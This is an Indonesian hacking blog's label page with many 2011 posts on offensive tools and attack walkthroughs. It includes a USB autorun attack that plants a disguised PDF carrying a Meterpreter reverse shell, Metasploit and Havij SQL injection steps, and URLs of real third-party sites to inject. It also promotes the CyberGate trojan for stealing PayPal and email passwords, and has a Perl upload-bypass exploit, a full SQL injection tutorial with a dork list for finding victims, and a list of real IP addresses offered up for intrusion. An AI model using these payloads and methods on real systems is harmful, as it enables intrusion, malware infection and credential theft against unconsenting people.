Tampilkan postingan dengan label Hacking. Tampilkan semua postingan
Tampilkan postingan dengan label Hacking. Tampilkan semua postingan

Jumat, 30 September 2011

0 Windows Editor v1.0 - Daftar, Tambah & Edit Sesi Logon

23.31 Under From deny saputra
[0 Comment]
Windows Editor (WCE) memungkinkan untuk daftar sesi logon dan menambah, mengubah, dan menghapus daftar mandat terkait (ex.: LM / NT hash). Ini dapat digunakan, misalnya, untuk melakukan pass-the-hash pada Windows dan juga memperoleh NT / LM hash dari memori (dari login interaktif, layanan, koneksi remote desktop, dll) yang dapat digunakan dalam serangan lebih lanjut.

Platform yang didukung

Mendukung Windows XP, 2003, Vista, 7 dan 2008 (Vista tidak benar-benar diuji, tapi itu harus bekerja).

Pilihan

Kredensial jendela Editor menyediakan opsi berikut:

         -l sesi logon dan kredensial NTLM Daftar (default).
         -s kredensial NTLM Perubahan sesi logon saat ini.
                    Parameter::::.
         -r Daftar logon dan kredensial NTLM sesi tanpa batas.
                    Refresh setiap 5 detik jika sesi baru yang ditemukan.
                    Opsional:-r.
         -c Jalankan di sesi baru dengan mandat yang ditetapkan NTLM.
                    Parameter:.
         Daftar e-logon kredensial NTLM tanpa batas sesi.
                    Refresh setiap kali terjadi peristiwa logon.
         -o menyimpan semua output ke file.
                    Parameter:.
         -i Tentukan LUID bukan sesi menggunakan logon saat ini.
                    Parameter:.
         -d Menghapus kredensial NTLM dari sesi logon.
                    Parameter:.
         -v verbose output.

Anda dapat mendownload Windows v1.0 Kredensial Editor di sini:

wce_v1.0.tgz
Read More »

0 WinAutopwn v2.7 Released – Windows Auto Hacking Tool

23.00 Under From deny saputra
[0 Comment]
Saya selalu skeptis tentang alat ini, terutama terlihat seolah-olah versi pertama dirilis pada hari April Mop tahun 2009, toh itu 2 tahun kemudian sekarang dan masih tampaknya menjadi sekitar jadi saya pikir pantas menerbitkan pembaruan.

Jika ada dari Anda telah benar-benar diuji alat ini keluar, melakukan drop komentar di bawah ini.

winAUTOPWN dan bsdAUTOPWN adalah Kerangka Interaktif minimal yang bertindak sebagai frontend untuk eksploitasi kerentanan sistem cepat. Dibutuhkan input seperti alamat IP, Hostname, Jalan CMS, dll dan melakukan portscan multi-threaded cerdas untuk port TCP 1-65535. Eksploitasi mampu memberikan Kerang Jauh, yang dipublikasikan untuk umum melalui Internet dengan kontributor aktif dan penulis mengeksploitasi terus ditambahkan ke winAUTOPWN / bsdAUTOPWN. Banyak dari eksploitasi yang ditulis dalam bahasa scripting seperti python, perl dan php. Kehadiran juru bahasa sangat penting untuk eksploitasi yang berhasil menggunakan winAUTOPWN / bsdAUTOPWN.

Eksploitasi ditulis dalam bahasa seperti C, Delphi, ASM yang dapat dikompilasi adalah pra-dikumpulkan dan ditambahkan bersama-dengan orang lain. Pada eksploitasi sukses winAUTOPWN / bsdAUTOPWN memberikan remote shell dan menunggu penyerang untuk menggunakan shell sebelum mencoba eksploitasi lainnya. Dengan cara ini penyerang dapat menghitung dan memeriksa jumlah eksploitasi yang sebenarnya bekerja pada Sistem Sasaran.

Baru di v2.7

Versi ini mencakup hampir semua eksploitasi jarak jauh sampai-sampai pertengahan Juli 2011 dan beberapa yang lebih tua juga. Versi ini menggabungkan beberapa parameter commandline baru:-perlrevshURL (untuk URL Shell PERL Reverse), - mailFROM (smtpsender) dan-mailto (smtpreceiver). Ini adalah argumen commandline diperlukan untuk beberapa eksploitasi yang memerlukan jarak jauh terhubung kembali menggunakan shell perl dan server email eksploitasi membutuhkan otentikasi masing-masing. Versi ini juga menangani berbagai bug dan perbaikan internal yang mereka.



Sebuah daftar lengkap dari semua Eksploitasi di winAUTOPWN tersedia di CHANGELOG.TXT
Daftar lengkap perubahan User Interface tersedia dalam UI_CHANGES.txt

Juga, dalam versi ini:

     BSDAUTOPWN telah diupgrade ke versi 1.5.
     Dalam rilis ini Anda juga akan menemukan binari pre-compiled untuk:
     FreeBSD x86
     FreeBSD x64
     Dragonfly BSD x86

Anda dapat mendownload winAUTOPWN v2.7 di sini:


winAUTOPWN_2.7.RAR
Read More »

0 Network Miner v1.1 Released – Windows Packet Analyzer & Sniffer

22.55 Under From deny saputra
[0 Comment]
NetworkMiner adalah Alat Analisis Jaringan Forensik (NFAT) untuk Windows. NetworkMiner dapat digunakan sebagai alat sniffer / paket jaringan pasif menangkap dalam rangka untuk mendeteksi sistem operasi, sesi, nama host, buka port dll tanpa meletakkan lalu lintas pada jaringan. NetworkMiner juga dapat mengurai file pcap untuk off-line analisis dan untuk regenerasi / memasang kembali file ditransmisikan dan sertifikat dari file pcap.

NetworkMiner mengumpulkan data (seperti bukti 



forensik) tentang host pada jaringan daripada untuk mengumpulkan data mengenai lalu lintas pada jaringan. Tampilan antarmuka pengguna utama adalah tuan rumah sentris (informasi dikelompokkan per host) daripada sentris paket (informasi menunjukkan sebagai daftar paket / frame).

NetworkMiner, sejak rilis pertama tahun 2007, menjadi alat populer di kalangan tim respon insiden serta penegakan hukum. NetworkMiner saat ini digunakan oleh perusahaan dan organisasi di seluruh dunia.




The new version supports features such as:
  • Extraction of Google Analytics data
  • Better parsing of SMB data
  • Support for PPP frames
  • Even more stable than the 1.0 release
You can download NetworkMiner v1.1 here:
NetworkMiner_1-1.zip
Read More »

Sabtu, 24 September 2011

1 Armitage - GUI Manajemen Attack Untuk Metasploit

18.03 Under From deny saputra
[1 Comment]
Armitage adalah sebuah Tools Grafis (Windows & Linux) untuk manajemen serangan yang digunakan pada Metasploit yang mampu memvisualisasikan target anda, merekomendasikan eksploitasi, dan memperlihatkan kemampuan canggih melalu sebuah skema. Armitage bertujuan untuk membuat Metasploit dapat digunakan untuk praktisi keamanan yang mengerti hacking. Jika Anda ingin belajar Metasploit dan melihat fitur-fitur canggih yang disiapkan, Armitage bisa jadi solusi anda.

Armitage mengatur kemampuan Metasploit saat proses hacking. Terdapat fitur untuk Discovery, akses, Post-exploitation, dan penetrasi/Manuver.

Untuk penemuan, Armitage mengekspos beberapa fitur-fitur manajemen host Metasploit. Anda dapat mengimpor host dan menjalankan scan pada database sasaran. Armitage juga memvisualisasikan database target sehingga anda akan selalu tahu mana host Anda bekerja dan di mana Anda memiliki session.

Armitage membantu dengan Remote Exploitation - menyediakan fitur untuk secara otomatis merekomendasikan eksploitasi yang akan digunakan dan bahkan menjalankan check aktif sehingga Anda tahu mana eksploitasi yang akan bekerja. Jika pilihan ini gagal, Anda dapat menggunakan pendekatan Hail Mary approach dan melepaskan db_autopwn terhadap database target Anda.

Armitage memaparkan fitur klien-sisi Metasploit. Anda dapat memulai browser exploits, menghasilkan malicous file, dan membuat executable meterpreter.

Setelah Anda masuk, Armitage menyediakan beberapa tools yang dibangun pasca-eksploitasi dengan kemampuan dari meterpreter agent. Dengan klik menu Anda akan memperoleh keistimewaan berupa, dump hash password untuk local credentials database, Browse file, dan meluncurkan Command Shell.



Yang terkahir, Armitage membantu proses pengaturan pivoting, yaitu sebuah kemampuan yang memungkinkan Anda menggunakan compromised host sebagai platform untuk menyerang host lain dan menyelidiki lebih lanjut jaringan target dengan kata lain Metasploit bisa meluncurkan serangan dari host yg dikompromikan dan menerima sesi pada host yang sama. Selain itu Armitage juga mengekspos modul SOCKS proxy Metasploit, yang memungkinkan tools eksternal untuk mengambil keuntungan dari pivoting. Dengan tools ini, Anda dapat lebih mengeksplorasi dan melakukan penetrasi maksimal melalui jaringan.

Untuk menggunakan Armitage, Anda memerlukan berikut ini:
* Linux atau Windows
* Java 1.6
* Metasploit Framework 3.5
* Database dikonfigurasi. Pastikan Anda tahu username, password, dan host.


Untuk Mendapatkan Armitage, Silahkan Download disini:

Windows – armitage112510.zip
Linux – armitage112510.tgz

--------------------------------------------------------------------------
Refrensi:
- http://www.fastandeasyhacking.com/manual
- http://www.darknet.org.uk/2010/12/ar...or-metasploit/
- http://www.commonexploits.com/
--------------------------------------------------------------------------

Read More »

0 Hacking Windows Menggunakan USB + Social Engineering Toolkit

17.41 Under From deny saputra
[0 Comment]
Tools yang digunakan : SET(Social Engineering Toolkit)
O.S yang digunakan : Backtrack 5
Victim O.S : Windows XP SP3 (fungsi autorun = on)

Seperti yang kita ketahui bahwa akhir-akhir ini USB benar-benar amat sangat populer penggunaannya di semua kalangan masyarakat...
Ketika saya masih nge-kost, kadang saya mendengar tetangga sebelah saya bilang sama tetangga sebelahnya lagi "Eh, gue copy dong lagu yang kemaren itu...nih USB nya, ntar kalo udah beres copy lo kasih tau gue aja ya".
Sebenarnya apakah mungkin melakukan serangan terhadap komputer lainnya hanya dengan menggunakan USB?? jawabannya kita lihat langkah-langkah berikut dibawah ini :
Persiapan :
1. SET
2. O.S(saya pake backtrack 5 yang udah include di dalemnya semua toolsnya)

Keterangan :

Tulisan Berwarna Merah = command line

Langkah-langkahnya :
1. Buka console backtrack (CTRL+ALT+T) lalu masuk ke folder /pentest/exploits/set.
cd /pentest/exploits/set

2. Jalankan Social Engineering Toolkit dengan perintah ./set.


3. Pilih Nomor 3 "Infectious File Generator" lalu pilih nomor 1 "File Format Exploit", dan selanjutnya masukkan IP address penyerang(komputer kita)


4. Pilih format exploit yang hendak digunakan...disini saya gunakan menggunakan "Adobe PDF Embedded EXE social engineering".

5. Langkah berikutnya yaitu memilih file PDF yang akan digunakan untuk menyerang.

Kalau kawan-kawan punya file PDF sendiri, itu jauh lebih bagus soalnya begitu si korban buka dia ngga terlalu curiga, jadi disini kita pilih nomor 1.

6. Langkah berikutnya adalah memilih payload atau apa yang ingin kita dapat dari korban jika ia meng-klik exploit yang kita buat. Disini saya memilih nomor 2 "Windows Meterpreter Reverse_TCP shell"

7. Berikutnya adalah melakukan setting connect back, maksudnya adalah ketika exploit berhasil dijalankan, pada port berapakah kita akan menangkap koneksi tersebut? disini saya gunakan port 80(kenapa harus port 80? nanti lihat di sumber aja ya)


8. Ketika muncul pertanyaan "Do you want to create a listener right now? [yes|no]" pilih YES.

9. Semua file yang berhasil di-generate oleh SET tersimpan pada folder /pentest/exploits/set/autorun, tetapi nama file tersebut agak mencurigakan & kurang menarik sehingga lebih baik jika kita rubah terlebih dahulu penamaan file tersebut.
masuk ke folder autorun :
cd /pentest/exploits/set/autorun

10. Lakukan perintah ini
pico autorun.inf

11. Didalam file autorun.inf, rubah template.pdf menjadi nama file yang menarik agar korban mau membuka file tersebut. Berikut adalah isi autorun.inf yang saya buat :
[autorun]
open=Soal_UAS_2011_Aljabar.pdf
icon=autorun.ico

Lalu tekan CTRL + O untuk melakukan SAVE dan CTRL + X untuk keluar.

12. Langkah selanjutnya adalah menamai template.pdf menjadi nama yang telah kita definisikan pada autorun.inf dengan perintah mv.
mv template.pdf Soal_UAS_2011_Aljabar.pdf

13. Selesai sudah, selanjutnya tinggal meng-copy kan semua file yang ada dalam folder autorun tersebut ke dalam USB anda.

14. Ketika victim mencolokkan USB dan autorun komputernya dalam keadaan aktif, maka ia akan otomatis membuka file PDF yang tadi telah kita buat.

15. Ketika ia meng-klik OK untuk setiap alert yang muncul, maka :


Sukses!

FAQ :
Q : Lalu bagaimana kalau ternyata autorun komputer victim dalam keadaan dimatikan??
A : Sifat manusia itu biasanya ingin tahu & penasaran, pasti segala cara akan ia lakukan agar PDF tersebut terbuka apalagi setelah tahu bahwa Title PDF nya memang penting & menarik untuknya.
Read More »

0 4 Langkah Hacking Kedalam Jcow Social Networking Web Server

17.38 Under From deny saputra
[0 Comment]
Apakah teman-teman di Jasakom pernah melihat CMS yang satu ini?
Jcow social networking...Ya, memang demikian namanya...Jcow menawarkan aplikasi berbasis web untuk situs jejaring sosial secara gratis alias free dan bisa dilihat di websitenya jcow.net dengan ukuran file yang cukup kecil hanya 777KB tidak lebih dari 1MB.

Tapi disini yang akan saya bahas bukanlah mengenai penggunaan dari si Jcow ini sebagai situs pertemanan, melainkan terdapatnya suatu vulnerability dari beberapa versi dari Jcow yang ternyata dapat disusupi hanya dalam 4 langkah , dan bahkan si penyusup dapat melihat isi direktori web server korban(jika ternyata servernya pun tidak menerapkan pengamanan yang baik).

Pada contoh yang akan saya buat dibawah ini, korban menggunakan IP : 192.168.8.94...
Jauh lebih baik kalau kawan-kawan mau belajar menggunakan virtual lab terlebih dahulu, tapi kalau ternyata penasaran ingin langsung to the wild arena, kawan-kawan juga bisa cari via google dork : "Powered by Jcow 4.2.0". Jika tertarik untuk langsung ke dunia nyata, kawan-kawan juga harus mempelajari logika dari teknik penyerangan via internet(klik disini)

O.S Penyerang : BT 5 R1
O.S Korban : XP SP3
Aplikasi vulnerable : Jcow 4.2


Pada artikel ini juga saya sebelumnya sudah membuat username : "victim dan password :"victim" pada aplikasi Jcow target.

Oke kita mulai langkah demi langkahnya dibawah ini

Kebutuhan :
1. Metasploit Framework (metasploit.com)
2. Script exploit jcow.rb(link mediafire di website asalnya)

Langkah-Langkahnya :
1. Copykan file exploit jcow.rb yang sudah di-download kedalam folder /pentest/exploits/framework/modules/exploits/remote/

cp jcow.rb /pentest/exploits/framework/modules/exploits/remote/


Jika bingung bagaimana cara meng-copy kan file exploit.rb kedalam Backtrack Linux, kawan-kawan bisa lihat tutorialnya disini.

2. Buka metasploit console dengan mengetikkan msfconsole pada terminal, lalu gunakan exploit yang sebelumnya sudah kita copy tadi.

msf > use exploit/remote/jcow


3. Selanjutnya ketikkan perintah show options untuk melihat switch apa saja yang dapat digunakan untuk exploit ini.
msf exploit(jcow) > set rhost 192.168.8.94 --> target IP
rhost => 192.168.8.94
msf exploit(jcow) > set username victim --> set username
username => victim
msf exploit(jcow) > set password victim --> set password
password => victim


4. Yep setelah semuanya selesai dikonfigurasi dengan baik, langkah terakhir tinggal menjalankan perintah exploit pada konsol metasploit.
Berhasil

Pengamanan :

1. Upgrade Jcow ke versi terbaru

Sumber : vishnuvalentino.com

Berani belajar hacking?
Mau belajar hacking?
Gabung & Like FB Page ini untuk mendapat informasi terbaru langkah hacking dengan mudah
http://www.facebook.com/computer.hacking.tutorial
Read More »

0 Hacking Email/paypal dengan Havij Dan Web Vuln

17.29 Under From deny saputra
[0 Comment]
havij dan Web vuln untuk pemula

kali ini saya share havij 1.15 pro beda ya feature nya pro sama free sangat berbeda jauh

lanjut kegunaan havij pun banyak fungsi nya salah satu nya untuk inject suatu website

dan untuk menghasilkan Login User dan pass itu intinya Contoh Web jualan dsb

disni saya akan langsung ngasih cara pake nya simple aja .
download dulu :
Code:
http://www.mediafire.com/?gbb3g7zn5wel8my
liat gambar


Code:
http://www.xtcabandonware.com/game.php?letter=d'&sstring='&type=all'&sort=name'&offset=0'&id=300'
http://www.loaddd.com/download.php?id=17'
http://www.gamelinks.com/link.php?id=2502'
http://www.zupidoo.com/game.php?id=36'
http://www.thedailyurinal.com/game.php?id=122'
http://www.comingsoon.net/news/movienews.php?id=70002'
http://www.gamepile.com/details.php?id=75'
http://www.vgmpf.com/Wiki/index.php?title=Wolfenstein_3D_(3DO)'
http://www.game-ost.com/articles.php?id=24'&action=view'
http://www.comingsoon.net/films.php?id=18902'
tuh link nya tinggal test simpen di target terus klik start jika anda berhasil nanti
akan meminta Colom dan table cek colom mana aja yg mau d inject terus buka tables
enjoy dah kena password nya eit ..setelah itu anda untuk decrypt pass nya silakan buka MD5
atau bs cari md5 online d google

ke dua tool ini untuk check website colom apa aja yang terbuka ok liat
maaf ya nerangin nya inti2 nya aja he2 :P cekidot



download :
Code:
http://hidemyass.com/files/RlO7d/
selamat mencoba
Read More »

0 Software remote komputer berbeda jaringan

17.24 Under From deny saputra
[0 Comment]
Sobat gempar69
gue ada software mantab
berupa trojan,yg fungsi nya meremote komputer yg berbeda jaringan
anda bisa mencuri data2 pada komputer korban.
Seperti : email, paypal, password dan data lain nya

Tools ini bernama CyberGate
yg saya mau share adalah versi terbaru dan
terpopuler saat ini di kalangan hacker








Tools ini di lengkapi :

- Keylogger
- Remote desktop
- Remote webcam
- Remote file manager
- DLL

NB: Tools ini terdeteksi sbg Trojan, so silahkan disable dlu antivirus nya
soal nya percuma klo download tp antivirus nya ga di matikan. Pasti dimakan
antivirus tersebut. seperti keylogger dan trojan lain nya. Utk tutorial nya
silahkan cari di google saja, jgn mau nya di suapin doang .

Download
Read More »

Jumat, 23 September 2011

0 PHP Upload Simple Patch dengan filter filetype

04.07 Under From deny saputra
[0 Comment]
Sobat Gempar69 akan membahas tentang cara simple mempatch PHP Arbitrary File Upload.
kebanyakan website yang vuln diupload memiliki garis besar seperti ini:
contoh simple upload.php file upload.
<?php
$uploaddir = 'uploads/'; // Relative path under webroot
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
echo "File is valid, and was successfully uploaded.\n";
} else {
echo "File uploading failed.\n";
}
?>
contoh form yang dipake dalam file index untuk upload
<form name="upload" action="upload1.php" method="POST" ENCTYPE="multipart/formdata">
Select the file to upload: <input type="file" name="userfile">
<input type="submit" name="upload" value="upload">
</form>
disini tidak ada code yang menfilter upload filetype
jadi kita bisa langsung saja upload shell.php
patching yg bisa dilakukan adalah menambahkan filter filetype dalam script upload.php
contohnya:
<?php
if($_FILES['userfile']['type'] != "image/gif") {
echo "Sorry, we only allow uploading GIF images";
exit;
}
$uploaddir = 'uploads/';
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
echo "File is valid, and was successfully uploaded.\n";
} else {
echo "File uploading failed.\n";
}
?>
untuk "images/gif" bisa diganti dengan "images/jpg" dll...
Happy Patching..
Read More »

0 Cara Membypass filetype PHP Arbitrary File Upload

04.05 Under From deny saputra
[0 Comment]
Ok semua..
sekarang saya akan melanjutkan pembahasan tentang PHP Arbitrary File Upload.
ok disana patchingnya emang ga terlalu bagus...
karena filetype bisa di manipulasi..
bukan dengan merename shell.jpg.php tetapi dengan memanipulasi 'header' file
cara membypassnya:
review codenya dulu
if($_FILES['userfile']['type'] != "image/gif") {
echo "Sorry, we only allow uploading GIF images";
exit;
}
kalo kita coba di HTTP response server kira-kira dapat begini dengan code diatas
POST /upload.php HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: localhost
User-Agent: libwww-perl/5.803
Content-Type: multipart/form-data;
Content-Length: 156
Content-Disposition: form-data; name="userfile"; filename="shell.php"
Content-Type: text/html
...
-
HTTP/1.1 200 OK
Date: Thu, 31 May 2007 13:54:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.2-pl6-gentoo
Connection: close
Content-Type: text/html
Sorry, we only allow uploading GIF images
ok kita liat... ada footprint yang keren disana..
gimana kalo kita manipulasi upload kita supaya http server membaca script kita sebagai images/gif
simple code exploitnya..
#!/usr/bin/perl
#
use LWP;
use HTTP::Request::Common;
$ua = $ua = LWP::UserAgent->new;;
$res = $ua->request(POST 'http://www.target.com/upload2.php', Content_Type => 'form-data',
Content => [ userfile => ["shell.php", "shell.php", "Content-Type" =>"image/gif"],],
);
print $res->as_string();
coba kita liat apakah sukses exploit kita..
POST /upload.php HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: localhost
User-Agent: libwww-perl/5.803
Content-Type: multipart/form-data;
Content-Length: 155
HTTP/1.1 200 OK
Date: Thu, 31 May 2007 14:02:11 GMT
Server: Apache
X-Powered-By: PHP/4.4.4-pl6-gentoo
Content-Length: 59
Connection: close
Content-Type: text/html
File is valid, and was successfully uploaded.
hohoohohoho...
untuk patchingnya:
kita perketat aja patchingnya dengan mengganti code diatas dengan code berikut
$imageinfo = getimagesize($_FILES['userfile']['tmp_name']);
if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg') {
echo "Sorry, we only accept GIF and JPEG images\n";
exit;
}
happy Patching..
Read More »

0 SQL Injection Complete Tutorial

03.45 Under From deny saputra
[0 Comment]
Here you will find a very detailed, step by step tutorial written by me (PhortyPhour) on SQL injection. This is purely for educational purposes and is to be used at the discretion of the reader.

First we have to know what SQL injection is exactly & lets say thanks to all member http://www.binushacker.net .

SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.

That is the first paragraph of the wikipedia page for SQLi (SQL injection) found here:
http://en.wikipedia.org/wiki/SQL_injection

I would advise reading the entire page.

What is covered in this tutorial?

Part One - Website Assessment
Section One - Finding a vulnerable website
Section Two - Determining the amount of columns
Section Three - Finding which columns are vulnerable

Part Two - Gathering Information
Section One - Determining the SQL version
Section Two - Finding the database

Part Three - The Good Stuff
Section One - Finding the table names
Section Two - Finding the column names
Section Three - Displaying the column contents
Section Four - Finding the admin page

Now let's begin.

Part One - Website Assessment

In order for us to start exploiting a website we must first know exactly what we are injecting into. This is what we will be covering in Part One along with how to assess the information that we gather.

Section One - Finding a vulnerable website

Vulnerable websites can be found using dorks (I will include a list at the end of this tutorial), either in Google or with an exploit scanner. For those of you that are unfamiliar with the term "dorks", I will try to explain.

Dorks are website URLs that are known to be vulnerable. In SQL injection these dorks look like this:

Code:
inurl:buy.php?id=

This will be inputted into a search engine and because of the "inurl:" part of the dork, the search engine will return results with URLs that contain the same characters. Some of the sites that have this dork on their website may be vulnerable to SQL injection.

Now let's say we found the page:

Code:
http://www.site.com/buy.php?id=1

In order to test this site all we need to do is add a ' either in between the "=" sign and the "1" or after the "1" so it looks like this:

Code:
http://www.site.com/buy.php?id=1'
or
http://www.site.com/buy.php?id='1

After pressing enter, if this website returns an error such as the following:

Code:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home1/michafj0/public_html/gallery.php on line 7

Or something along those lines, this means it's vulnerable to injection.

In the case where you are to find a website such as this:

Code:
http://www.site.com/buy.php?id=1&dog;catid=2

Then you must use the same technique with adding a ' except it must be between the value (in this case the number) and the operator (the "=" sign) so it looks like this:

Code:
http://www.site.com/buy.php?id='1&dog;catid='2

There are programs that will do this for you but to start off I would suggest simply to do things manually, using Google, and so I won't post any for you guys. If you feel so compelled to use one anyways. I recommend the Exploit Scanner by Reiluke.

Section Two - Determining the amount of columns

In order for us to be able to use commands and get results we must know how many columns there are on a website. So to find the number of columns we must use a very complex and advanced method that I like to call "Trial and Error" with the ORDER BY command Biggrin

NOTE: SQL does not care whether or not your letters are capitalized or not and I'm just doing it out of clarity, for all it cares your queries could look like this:

Code:
http://www.site.com/buy.php?id=-1 CaN I HaZ TeH PaSSwOrDs? PLz aNd ThX

IT DOESN'T MATTER (btw please don't think that was an actual command).

So back to the ORDER BY command. To find the number of columns we write a query with incrementing values until we get an error, like this:

Code:
http://www.site.com/buy.php?id=1 ORDER BY 1-- <---No error
http://www.site.com/buy.php?id=1 ORDER BY 2-- <---No error
http://www.site.com/buy.php?id=1 ORDER BY 3-- <---No error
http://www.site.com/buy.php?id=1 ORDER BY 4-- <---No error
http://www.site.com/buy.php?id=1 ORDER BY 5-- <---ERROR!

This means that there are four columns!

DON'T FORGET TO INCLUDE THE DOUBLE NULL (--) AFTER THE QUERY.
VERY IMPORTANT!

Section Three - Finding which columns are vulnerable

So we know that there are four columns now we have to find out which ones are vulnerable to injection. To do this we use the UNION and SELECT queries while keeping the double null (--) at the end of the string. There is also one other difference that is small in size but not in importance, see if you can spot it.

Code:
http://www.site.com/buy.php?id=-1 UNION SELECT 1,2,3,4--

If you couldn't spot the difference, it's the extra null in between the "=" sign and the value (the number).

buy.php?id=-1

Now after entering that query you should be able to see some numbers somewhere on the page that seem out of place. Those are the numbers of the columns that are vulnerable to injection. We can use those columns to pull information from the database which we will see in Part Two.

Part Two - Gathering Information

In this part we will discover how to find the name of the database and what version of SQL the website is using by using queries to exploit the site.

Section One - Determining the SQL version.

Finding the version of the SQL of the website is a very important step because the steps you take for version 4 are quite different from version 5 in order to get what you want. In this tutorial, I will not be covering version 4 because it really is a guessing game and for the kind of sites that are still using it, it's not worth your time.

If we look back to the end of Section Three in Part One we saw how to find the vulnerable columns. Using that information we can put together our next query (I will be using column 2). The command should look like this:

Code:
http://www.site.com/buy.php?id=-1 UNION SELECT 1,@@version,3,4--

Because 2 is the vulnerable column, this is where we will place "@@version". Another string that could replace "@@version" is "version()".

If the website still does not display the version try using unhex(hex()) which looks like this:

Code:
http://www.site.com/buy.php?id=-1 UNION SELECT 1,unhex(hex(@@version)),3,4--

NOTE: If this method must be used here, it must be used for the rest of the injection as well.

Now what you want to see is something along these lines:

Code:
5.1.47-community-log

Which is the version of the SQL for the website.

NOTE: If you see version 4 and you would like to have a go at it, there are other tutorials that explain how to inject into it.

Section Two - Finding the database

Finding the name of the database is not always a necessary step to take to gather the information that you want, however in my experience folllowing these steps and finding the database may sometimes lead to a higher success rate.

To find the database we use a query like the one below:

Code:
http://www.site.com/buy.php?id=-1 UNION SELECT 1,group_concat(schema_name),3,4 from information_schema.schemata--

This could sometimes return more results than necessary and so that is when we switch over to this query instead:

Code:
http://www.site.com/buy.php?id=-1 UNION SELECT 1,concat(database()),3,4--

Congrats! You now have the name of the database! Copy and paste the name somewhere safe, we'll need it for later.

Part Three - The Good Stuff

This is the fun part where we will find the usernames, emails and passwords!

Section One - Finding the table names

To find the table names we use a query that is similar to the one used for finding the database with a little bit extra added on:

Code:
http://www.site.com/buy.php?id=-1 UNION SELECT 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()--

It may look long and confusing but once you understand it, it really isn't so I'll try to explain. What this query does is it "groups" (group_concat) the "table names" (table_name) together and gathers that information "from" (FROM) information_schema.tables where the "table schema" (table_schema) can be found in the "database" (database()).

NOTE: While using group_concat you will only be able to see 1024 characters worth of tables so if you notice that a table is cut off on the end switch over to limit which I will explain now.

Code:
http://www.site.com/buy.php?id=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1--

What this does is it shows the first and only the first table. So if we were to run out of characters on let's say the 31st table we could use this query:

Code:
http://www.site.com/buy.php?id=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema=database() LIMIT 30,1--

Notice how my limit was 30,1 instead of 31,1? This is because when using limit is starts from 0,1 which means that the 30th is actually the 31st Tongue

You now have all the table names!


Section Two - Finding the column names

Now that you have all of the table names try and pick out the one that you think would contain the juicy information. Usually they're tables like User(s), Admin(s), tblUser(s) and so on but it varies between sites.

After deciding which table you think contains the information, use this query (in my example, I'll be using the table name "Admin"):

Code:
http://www.site.com/buy.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name="Admin"--

This will either give you a list of all the columns within the table or give you an error but don't panic if it is outcome #2! All this means is that Magic Quotes is turned on. This can be bypassed by using a hex or char converter (they both work) to convert the normal text into char or hex (a link to a website that does this will be included at the end of the tutorial).

UPDATE: If you get an error at this point all you must do is follow these steps:

1. Copy the name of the table that you are trying to access.
2. Paste the name of the table into this website where it says "Say Hello To My Little Friend".
Hex/Char Converter
http://www.swingnote.com/tools/texttohex.php
3. Click convert.
4. Copy the string of numbers/letters under Hex into your query so it looks like this:

Code:
http://www.site.com/buy.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name=0x41646d696e--

Notice how before I pasted the hex I added a "0x", all this does is tells the server that the following characters are part of a hex string.

You should now see a list of all the columns within the table such as username, password, and email.

NOTE: Using the limit function does work with columns as well.

Section Three - Displaying the column contents

We're almost done! All we have left to do is to see what's inside those columns and use the information to login! To view the columns we need to decide which ones we want to see and then use this query (in this example I want to view the columns "username", "password", and "email", and my database name will be "db123"). This is where the database name comes in handy:

Code:
http://www.site.com/buy.php?id=-1 UNION SELECT 1,group_concat(username,0x3a,password,0x3a,email),3,4 FROM db123.Admin--

In this query, 0x3a is the hex value of a colon (Smiley which will group the username:password:email for the individual users just like that.

FINALLY! Now you have the login information for the users of the site, including the admin. All you have to do now is find the admin login page which brings us to Section Four.

Section Four - Finding the admin page

Usually the admin page will be directly off of the site's home page, here are some examples:

Code:
http://www.site.com/admin
http://www.site.com/adminlogin
http://www.site.com/modlogin
http://www.site.com/moderator

Once again there are programs that will find the page for you but first try some of the basic guesses, it might save you a couple of clicks. If you do use a program Reiluke has coded one for that as well. Search Admin Finder by Reiluke.

And that conlcudes my tutorial! I hope it was helpful to some of you. Remember to keep practicing and eventually you'll have all of the queries memorized in no time!

Comment and Rate!

Give credit where credit is due!

I do keep my promises so here is what I said I would include:

Dork List
trainers.php?id=
article.php?ID=
play_old.php?id=
declaration_more.php?decl_id=
Pageid=
games.php?id=
newsDetail.php?id=
staff_id=
historialeer.php?num=
product-item.php?id=
news_view.php?id=
humor.php?id=
communique_detail.php?id=
sem.php3?id=
opinions.php?id=
spr.php?id=
pages.php?id=
chappies.php?id=
prod_detail.php?id=
viewphoto.php?id=
view.php?id=
website.php?id=
hosting_info.php?id=
gery.php?id=
detail.php?ID=
publications.php?id=
Productinfo.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
product_ranges_view.php?ID=
shop_category.php?id=
channel_id=
newsid=
news_display.php?getid=
ages.php?id=
clanek.php4?id=
review.php?id=
iniziativa.php?in=
curriculum.php?id=
labels.php?id=
look.php?ID=
galeri_info.php?l=
tekst.php?idt=
newscat.php?id=
newsticker_info.php?idn=
rubrika.php?idr=
offer.php?idf=

There are more extensive lists of dorks that can be found.

Hex/Char Converter
http://www.swingnote.com/tools/texttohex.php
Read More »

0 Hack admin Speedy siapa bisa masuk ini IP nya tak kasih

03.42 Under From deny saputra
[0 Comment]
list IP
180.247.130.12
180.247.130.13
180.247.130.14
180.247.130.15
